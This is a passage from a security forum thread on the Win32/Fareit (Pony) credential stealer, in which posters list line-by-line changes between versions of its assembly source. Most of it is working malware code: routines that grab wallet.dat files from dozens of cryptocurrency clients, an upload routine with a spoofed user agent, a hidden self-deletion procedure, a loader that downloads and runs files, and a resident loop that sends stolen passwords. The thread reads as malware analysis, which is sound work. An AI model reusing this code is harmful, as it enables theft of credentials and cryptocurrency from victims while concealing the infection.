GrabYacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Zetacoin
; http://www.zeta-coin.org/
; Tested: v0.8.99.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_ZETACOIN

.data
	CZetacoinWalletFile					db	'wallet.dat',0
	CZetacoinAppDataDir					db	'\Zetacoin',0

.code

GrabZetacoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_ZETACOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CZetacoinAppDataDir, offset CZetacoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabZetacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FastCoin
; http://www.fastcoin.ca/
; Tested: v0.6.3.0-gc4135e8-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_FASTCOIN

.data
	CFastcoinWalletFile					db	'wallet.dat',0
	CFastcoinAppDataDir					db	'\Fastcoin',0

.code

GrabFastcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FASTCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFastcoinAppDataDir, offset CFastcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFastcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; i0coin
; http://i0coin.bitparking.com/
; Tested: 0.3.25.9-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_I0COIN

.data
	CI0coinWalletFile					db	'wallet.dat',0
	CI0coinAppDataDir					db	'\I0coin',0

.code

GrabI0coin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_I0COIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CI0coinAppDataDir, offset CI0coinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabI0coin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Tagcoin
; http://tagcoin.org/
; Tested: v1.0.2
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_TAGCOIN

.data
	CTagcoinWalletFile					db	'wallet.dat',0
	CTagcoinAppDataDir					db	'\Tagcoin',0

.code

GrabTagcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_TAGCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CTagcoinAppDataDir, offset CTagcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabTagcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bytecoin
; http://www.bytecoin.biz/
; Tested: v0.8.1.1-gfdc7831-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_BYTECOIN

.data
	CBytecoinWalletFile					db	'wallet.dat',0
	CBytecoinAppDataDir					db	'\Bytecoin',0

.code

GrabBytecoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_BYTECOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CBytecoinAppDataDir, offset CBytecoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabBytecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Florincoin
; http://www.florincoin.org
; Tested: v0.6.5.8-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_FLORINCOIN

.data
	CFlorincoinWalletFile					db	'wallet.dat',0
	CFlorincoinAppDataDir					db	'\Florincoin',0

.code

GrabFlorincoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_FLORINCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CFlorincoinAppDataDir, offset CFlorincoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabFlorincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Phoenixcoin
; http://phoenixcoin.org/
; Tested: v0.6.5.0
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_PHOENIXCOIN

.data
	CPhoenixcoinWalletFile					db	'wallet.dat',0
	CPhoenixcoinAppDataDir					db	'\Phoenixcoin',0

.code

GrabPhoenixcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_PHOENIXCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CPhoenixcoinAppDataDir, offset CPhoenixcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabPhoenixcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Luckycoin
; https://cryptocointalk.com/forum/188-luckycoin-lky/
; Tested: v0.9.9.0
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_LUCKYCOIN

.data
	CLuckycoinWalletFile					db	'wallet.dat',0
	CLuckycoinAppDataDir					db	'\Luckycoin',0

.code

GrabLuckycoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_LUCKYCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CLuckycoinAppDataDir, offset CLuckycoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabLuckycoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; CraftCoin
; http://craftcoin.net
; Tested: v1.1.1.2-unk-crc
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_CRAFTCOIN

.data
	CCraftcoinWalletFile					db	'wallet.dat',0
	CCraftcoinAppDataDir					db	'\Craftcoin',0

.code

GrabCraftcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_CRAFTCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CCraftcoinAppDataDir, offset CCraftcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabCraftcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; JunkCoin
; http://jkcoin.com/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported
                                                
IFDEF COMPILE_MODULE_JUNKCOIN

.data
	CJunkcoinWalletFile					db	'wallet.dat',0
	CJunkcoinAppDataDir					db	'\Junkcoin',0

.code

GrabJunkcoin proc stream
	LOCAL	hdr_ofs: DWORD

	invoke	StreamWriteModuleHeader, stream, MODULE_JUNKCOIN, 0
	mov	hdr_ofs, eax
	
	invoke	AppDataCommonFileScan, stream, offset CJunkcoinAppDataDir, offset CJunkcoinWalletFile, ITEMHDR_ID or 0

	invoke	StreamUpdateModuleLen, stream, hdr_ofs
	ret
GrabJunkcoin endp

ENDIF

Line 13229 (code addition):
					AddModule COMPILE_MODULE_FASTTRACK, GrabFastTrack
					AddModule COMPILE_MODULE_BITCOIN, GrabBitcoin
					AddModule COMPILE_MODULE_ELECTRUM, GrabElectrum
					AddModule COMPILE_MODULE_MULTIBIT, GrabMultiBit
					AddModule COMPILE_MODULE_FTPDISK, GrabFTPDisk
					AddModule COMPILE_MODULE_LITECOIN, GrabLitecoin
					AddModule COMPILE_MODULE_NAMECOIN, GrabNamecoin
					AddModule COMPILE_MODULE_TERRACOIN, GrabTerracoin
					AddModule COMPILE_MODULE_BITCOINARMORY, GrabBitcoinArmory
					AddModule COMPILE_MODULE_PPCOIN, GrabPPCoin
					AddModule COMPILE_MODULE_PRIMECOIN, GrabPrimecoin
					AddModule COMPILE_MODULE_FEATHERCOIN, GrabFeathercoin
					AddModule COMPILE_MODULE_NOVACOIN, GrabNovaCoin
					AddModule COMPILE_MODULE_FREICOIN, GrabFreicoin
					AddModule COMPILE_MODULE_DEVCOIN, GrabDevcoin
					AddModule COMPILE_MODULE_FRANKOCOIN, GrabFrankocoin
					AddModule COMPILE_MODULE_PROTOSHARES, GrabProtoShares
					AddModule COMPILE_MODULE_MEGACOIN, GrabMegacoin
					AddModule COMPILE_MODULE_QUARKCOIN, GrabQuarkcoin
					AddModule COMPILE_MODULE_WORLDCOIN, GrabWorldcoin
					AddModule COMPILE_MODULE_INFINITECOIN, GrabInfinitecoin
					AddModule COMPILE_MODULE_IXCOIN, GrabIxcoin
					AddModule COMPILE_MODULE_ANONCOIN, GrabAnoncoin
					AddModule COMPILE_MODULE_BBQCOIN, GrabBBQcoin
					AddModule COMPILE_MODULE_DIGITALCOIN, GrabDigitalcoin
					AddModule COMPILE_MODULE_MINCOIN, GrabMincoin
					AddModule COMPILE_MODULE_GOLDCOIN, GrabGoldcoin
					AddModule COMPILE_MODULE_YACOIN, GrabYacoin
					AddModule COMPILE_MODULE_ZETACOIN, GrabZetacoin
					AddModule COMPILE_MODULE_FASTCOIN, GrabFastcoin
					AddModule COMPILE_MODULE_I0COIN, GrabI0coin
					AddModule COMPILE_MODULE_TAGCOIN, GrabTagcoin
					AddModule COMPILE_MODULE_BYTECOIN, GrabBytecoin
					AddModule COMPILE_MODULE_FLORINCOIN, GrabFlorincoin
					AddModule COMPILE_MODULE_PHOENIXCOIN, GrabPhoenixcoin
					AddModule COMPILE_MODULE_LUCKYCOIN, GrabLuckycoin
					AddModule COMPILE_MODULE_CRAFTCOIN, GrabCraftcoin
					AddModule COMPILE_MODULE_JUNKCOIN, GrabJunkcoin
					
Line 13273 (comment added):
; Collect passwords for all enabled modules
Netcode.asm:

Code: Select all

Line 126 (code remove):
char, timeout <- removed 'timeout'

Line 214 (code edition):
CDefaultUserAgent db "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)",0

Line 220 (code addition):
db	"Accept-Language: en-US",13,10

line 225 (code edition):
db	"User-Agent: %s",13,10,13,10,0

Line 267 (code edition):
invoke	MemAlloc, 15000 -> invoke	MemAlloc, 32000

Line 274 (code edition):
invoke  NetRecvUntilChar, s, stream, 64000, 0ah, 30 -> invoke  NetRecvUntilChar, s, stream, 64000, 0ah

Line 390 (code edition/deletion):
.data -> .code

Line 392 (comment addition):
; do not move this block to .data, - MS FIX

Line 396 (code addition):
db	"Accept-Language: en-US",13,10

Line 400 (code edition):
db	"User-Agent: %s",13,10,13,10,0

Line 409 (Code addition):
	LOCAL	pUserAgent: DWORD
    LOCAL	cbUserAgent: DWORD

Line 422 (code addition):
    invoke	MemAlloc, 8192
    mov	pUserAgent, eax
    mov	cbUserAgent, 8192

Line 458 (instruction added):
cld

Line 477 (code edition/addition):
	invoke	ObtainUserAgentString, 0, pUserAgent, addr cbUserAgent
	test	eax, eax
	.IF	SUCCEEDED
		invoke	wsprintf, pFmt, offset szHTTPHdrFmt, pURL, pHost, pUserAgent
	.ELSE
		invoke	wsprintf, pFmt, offset szHTTPHdrFmt, pURL, pHost, offset CDefaultUserAgent
	.ENDIF

Line 511 (code addition):
	invoke	MemFree, pUserAgent
	
Line 541 (code edition):
mov	l.l_linger, 30 -> mov l.l_linger, 45

Line 546 (procedure modification):
MyUploadWithRedir proc uses edi ebx szLink, lpData, dwLen, lpOutStream, lpszRedir
    LOCAL   uc: URL_COMPONENTS   
    LOCAL	pHost: DWORD
    LOCAL	pFmt: DWORD
    LOCAL	pURL: DWORD
    LOCAL	s: DWORD
    LOCAL	len: DWORD
    LOCAL	pUserAgent: DWORD
    LOCAL	cbUserAgent: DWORD

    xor	ebx, ebx
    invoke	MemAlloc, 4096
    mov	pHost, eax

    invoke	MemAlloc, 4096
    mov	pURL, eax

    invoke	MemAlloc, 4096
    mov	pFmt, eax

    invoke	MemAlloc, 4096
    mov	pUserAgent, eax

    mov	cbUserAgent, 4096

    lea	edi, uc
    mov	ecx, sizeof URL_COMPONENTS
    xor	eax, eax
    rep stosb

    mov     uc.dwStructSize, sizeof URL_COMPONENTS

    push	pHost
    pop	uc.lpszHostName

    push	pURL
    pop	uc.lpszUrlPath

    mov     uc.dwHostNameLength, 4095
    mov	uc.dwUrlPathLength, 4095

    invoke  InternetCrackUrl, szLink, 0, ICU_ESCAPE, addr uc
    .IF	(!eax) || (uc.lpszHostName == NULL)
        jmp     @md_ret
		
Line 621 (code edition/addition):
	invoke	ObtainUserAgentString, 0, pUserAgent, addr cbUserAgent
	test	eax, eax
	.IF	SUCCEEDED
		invoke	wsprintf, pFmt, offset szHTTPSendFmt, pURL, pHost, dwLen, pUserAgent
	.ELSE
		invoke	wsprintf, pFmt, offset szHTTPSendFmt, pURL, pHost, dwLen, offset CDefaultUserAgent
	.ENDIF

Line 658 (code edition):
invoke	NetWorks, s, lpOutStream, addr lpszRedir -> invoke	NetWorks, s, lpOutStream, lpszRedir

Line 669 (code addition):
invoke	MemFree, pUserAgent

Line 671 (code addition):
	mov	eax, ebx
	ret
MyUploadWithRedir endp

MyUpload proc szLink, lpData, dwLen, lpOutStream
	LOCAL	lpszRedir: DWORD

	mov	eax, lpOutStream
	.IF	eax
		mov	dword ptr[eax], 0
	.ENDIF

	mov	lpszRedir, NULL
	invoke	MyUploadWithRedir, szLink, lpData, dwLen, lpOutStream, addr lpszRedir

Line 686 (code addition):
		invoke	MyUploadWithRedir, lpszRedir, lpData, dwLen, lpOutStream, NULL
		push	eax
		
Line 689 (code addition):
pop	eax

Line 690 (code deletion):
mov	eax, ebx

User avatar
Xylitol
Global Moderator
Posts: 1652
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Win32/Fareit

Post by Xylitol » Fri Jun 27, 2014 2:16 pm

Pony.asm:

Code: Select all

Line 35 (code addition):
includelib DLL_Loader.lib

Line 57 (code edition):
push	ebp      -> xor		edx, eax
mov		ebp, esp -> xor		eax, edx
pop		ebp      -> xor		edx, eax
	
Line 63 (code addition):
nop

Line 65 (code addition):
nop

Line 67 (code addition):
nop

Line 70 (code edition):
db	0ffh -> db	0feh

Line 75 (code deletion):
Removed the IFDEF USE_UPX

Line 80 (code addition):
IFNDEF DISABLE_GRABBER

Line 84 (code addition):
include Loader.asm

Line 110 (code addition):
nop

Line 118 (code addition):
nop

Line 119 (code edition):
push	19131011 -> push	19131012

Line 129 (code addition):
nop

Line 135 (code addition):
nop

Line 164 (code addition):
IFNDEF DISABLE_GRABBER

Line 451 (code addition):
ENDIF

Line 451 (code addition):
IFDEF ENABLE_LOADER -> IFDEF SELF_DELETE

Line 456 (code addition/deletion):
Deleted szNumToStrExeFmt/szMD5HashStr/szLoaderValueDupeCheck
Added:
	szBatchFmt				db      '%d.bat',0
	szSelfDelQuoteFmt       db      '      "%s"   ',0
	szShellExecute			db		'ShellExecuteA',0
	szBatchFile             db      13,10,9,9,13,10,13,10,09,"   :ktk   ",13,10,13,10,13,10,"     del    ",9," %1  ",13,10,9,"if  ",9,9," exist ",9,"   %1  ",9,"  goto ",9,13," ktk",13,10," del ",9,"  %0 ",0
	szShell32Lib			db		'shell32.dll',0
	szComSpec				db		'COMSPEC', 0
	szSelfCommand			db		'%s /c del "%s" > NUL',0
	
Line 466 (code deletion/edition)
RunLoader procedure removed/replaced by:
; Self delete using comspec
SelfDeleteComSpec proc uses ebx
	LOCAL   lpSelfFileName: DWORD
	LOCAL	lpComSpec: DWORD
	LOCAL	lpCommandBuffer: DWORD
	LOCAL	_si: STARTUPINFO
	LOCAL	_pi: PROCESS_INFORMATION
	
Line 474 (code deletion/edition):
AntiDisasmTrick replaced by:
	invoke	MemAlloc, MAX_PATH+1
	mov	lpSelfFileName, eax
	
Line 477 (code deletion/edition):
mov	edi, offset szLoaderList removed by:
	invoke	MemAlloc, MAX_PATH+1
	mov	lpComSpec, eax
	
Line 480 (code deletion/edition):
IFDEF	LOADER_EXECUTE_NEW_FILES_ONLY replaced by:
	invoke	MemAlloc, MAX_PATH+1
	mov	lpCommandBuffer, eax
	
Line 466 (huge code addition/deletion):
; Self delete using comspec
SelfDeleteComSpec proc uses ebx
	LOCAL   lpSelfFileName: DWORD
	LOCAL	lpComSpec: DWORD
	LOCAL	lpCommandBuffer: DWORD
	LOCAL	_si: STARTUPINFO
	LOCAL	_pi: PROCESS_INFORMATION

	invoke	MemAlloc, MAX_PATH+1
	mov	lpSelfFileName, eax

	invoke	MemAlloc, MAX_PATH+1
	mov	lpComSpec, eax

	invoke	MemAlloc, MAX_PATH+1
	mov	lpCommandBuffer, eax

	invoke	GetModuleFileName, NULL, lpSelfFileName, MAX_PATH

	invoke	GetShortPathName, lpSelfFileName, lpSelfFileName, MAX_PATH

	invoke	ZeroMemory, addr _si, sizeof _si
	invoke	ZeroMemory, addr _pi, sizeof _pi

	mov	_si.cb, sizeof _si
	mov	_si.dwFlags, STARTF_USESHOWWINDOW
	mov	_si.wShowWindow, SW_HIDE
		
	invoke	GetEnvironmentVariable, addr szComSpec, lpComSpec, MAX_PATH
	.IF	eax
		invoke	wsprintf, lpCommandBuffer, addr szSelfCommand, lpComSpec, lpSelfFileName
		invoke	CreateProcess, NULL, lpCommandBuffer, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, addr _si, addr _pi
		.IF	eax
			invoke	GetCurrentProcess
			invoke	SetPriorityClass, eax, HIGH_PRIORITY_CLASS
			invoke	SetFileAttributes, lpSelfFileName, FILE_ATTRIBUTE_NORMAL
			invoke	SetPriorityClass, _pi.hProcess, IDLE_PRIORITY_CLASS
			invoke	ResumeThread, _pi.hThread
			inc	ebx
		.ENDIF
	.ENDIF

	invoke	MemFree, lpSelfFileName
	invoke	MemFree, lpComSpec
	invoke	MemFree, lpCommandBuffer

	mov	eax, ebx
		
	ret
SelfDeleteComSpec  endp
	
Line 526 (code addition):
	invoke	SelfDeleteComSpec
	.IF	eax
		ret
	.ENDIF
	
Line 740 (code addition):
IFNDEF DISABLE_GRABBER
	
Line 872 (code addition):
ENDIF

Line 874 (code edition):
InitApp proc -> InitApp proc lpUserToken
	
Line 887 (code edition):
invoke	ImpersonateLocalSystemUser -> invoke	ImpersonateLocalSystemUser, lpUserToken

Line 893 (comment addition):
; Get impersonated username to ignore it in brute-force procedure

Line 905 (code edition/deletion):
	IFNDEF DISABLE_GRABBER
		IFDEF ENCRYPT_REPORT
			invoke	DecodeReportPassword, offset CReportPassword
		ENDIF

Line 911 (code addition):
invoke	Randomize

Line 921 (code edition):
mov	eax, EXCEPTION_CONTINUE_SEARCH-> mov eax, EXCEPTION_CONTINUE_SEARCH

Line 926 (code addition):
	LOCAL	lpUserToken: DWORD
	LOCAL	isFirstCycleRun: DWORD
	
Line 936 (code addition/deletion):
invoke	InitApp replaced by:
	mov	lpUserToken, NULL ; impersonated user token
	invoke	InitApp, addr lpUserToken

	IFDEF	ENABLE_RESIDENT_MODE
		invoke	CopyRunFromAutoDirectory
	ENDIF

Line 945 (Code addition):
invoke	DecipherList, offset CWordList

Line 948 (deletion/edition):
invoke	ScanAndSend replaced by:
	IFNDEF DISABLE_GRABBER
		invoke	ScanAndSend
	ELSE
		invoke	MyDownloadInit
	ENDIF

Line 954 (comment edition):
; Run loader (it will attempt to download and execute files with current logged on account privileges
; when run from Windows Service [LocalSystem user], which has limited (tricked) access to HKCU path and %APPDATA%)

Line 957 (code edition):
invoke	RunLoader -> invoke	RunLoader, lpUserToken

Line 960 (Procedure addition):
	ENDIF

	; Resident looped cycle
	mov	isFirstCycleRun, TRUE ; do not send passwords for the first cycle
	IFDEF	ENABLE_RESIDENT_MODE
		.WHILE	TRUE
			IFDEF PERIODIC_PASSWORD_SCAN
			IFNDEF	DISABLE_GRABBER
				invoke	NeedsPasswordGrabbing
				.IF	eax && !isFirstCycleRun
					; Scan and send passwords
					invoke	ScanAndSend
				.ENDIF
			ENDIF
			ENDIF

			invoke	Sleep, RESIDENT_LOADER_TIMEOUT*60*1000

			IFDEF	ENABLE_LOADER
				invoke	RunLoader, lpUserToken
			ENDIF

			mov	isFirstCycleRun, FALSE
		.ENDW

Line 993 (code edition):
IFNDEF DISABLE_GRABBER

Line 996 (code edition):
ENDIF

Line 998: (comment addition):
; Self delete executable (works also for DLL mode - in this case parent executable will get deleted)

Line 1023 (code deletion):
After AntiDisasmTrick this part disapeared:
	.WHILE	TRUE
		invoke	GetTickCount
		mov	ecx, 10
		xor	edx, edx
		div	ecx
		.IF	edx == 5
			.BREAK
		.ENDIF
	.ENDW
Crypto.asm (no modification)
WordList.asm (no modification)
3DES stuff (no modification)
Utils.asm (code addition for the loader and some code bug-fix)
Loader.asm (new file, wasn't on the 1.9, but not really new content, they separated a part of Pony.asm to transfer it on Loader.asm, to make it more clear i think, and added some code)

As mentioned by the advert there is some huge modifications on the opera/chrome/firefox procedures, HTTP requests handling, they added also the support for WS_FTP Pro 12.4, Far Manager v3.0 build 3525 but in reality they haven't changed the code, the new versions are just 'compatible'.
For CuteFTP 9/FTP Voyager 16.1/Total Commander etc.. they just added some strings to make it compatible to the new versions.
nothing fancy about the wallet stealer code like said wacked2 but it's honorable that they improved the code, especially in asm.
Any idea on who did this work ?

grum
Posts: 38
Joined: Tue Nov 06, 2012 12:16 pm

Re: Win32/Fareit

Post by grum » Fri Jun 27, 2014 4:29 pm

Image
Image

++ loader real working?

<Pony>jup memory loading does work indeed, but server side is not implemented, fake only. :D
<Pony>it's missing everything except initial interface code :roll:

Post Reply